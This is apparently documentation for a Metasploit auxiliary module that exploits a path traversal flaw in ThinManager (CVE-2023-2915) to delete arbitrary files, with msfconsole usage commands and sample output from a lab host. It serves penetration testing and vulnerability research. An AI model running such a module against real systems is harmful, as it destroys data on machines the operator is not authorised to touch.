cgranleese-r7
1.8 KiB
1.8 KiB
Vulnerable Application
This module exploits a path traversal vulnerability in ThinManager <= v13.1.0 (CVE-2023-2915) to delete an arbitrary file from the system.
The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM.
Testing
The software can be obtained from the vendor.
Successfully tested on
- ThinManager v13.1.0 on Windows 22H2
- ThinManager v13.0.1 on Windows 22H2
- ThinManager v13.0.0 on Windows 22H2
- ThinManager v12.1.5 on Windows 22H2
- ThinManager v10.0.2 on Windows 22H2
Verification Steps
- Install and run the application
- Start
msfconsoleand run the following commands:
msf > use auxiliary/gather/thinmanager_traversal_delete
msf auxiliary(gather/thinmanager_traversal_delete) > set RHOSTS <IP>
msf auxiliary(gather/thinmanager_traversal_delete) > set FILE <file to delete>
msf auxiliary(gather/thinmanager_traversal_delete) > run
This should delete the file as specified through FILE from the remote server.
Options
FILE
The file to delete from the remote server.
Scenarios
Running the exploit against ThinManager v13.0.1 on Windows 22H2 should result in an output similar to the following:
msf auxiliary(gather/thinmanager_traversal_delete) > run
[*] Running module against 192.168.137.229
[*] 192.168.137.229:2031 - Running automatic check ("set AutoCheck false" to disable)
[!] 192.168.137.229:2031 - The service is running, but could not be validated.
[*] 192.168.137.229:2031 - Sending handshake...
[*] 192.168.137.229:2031 - Received handshake response.
[*] 192.168.137.229:2031 - Deleting /Windows/win.ini from 192.168.137.229
[+] 192.168.137.229:2031 - Received response from target.
[*] Auxiliary module execution completed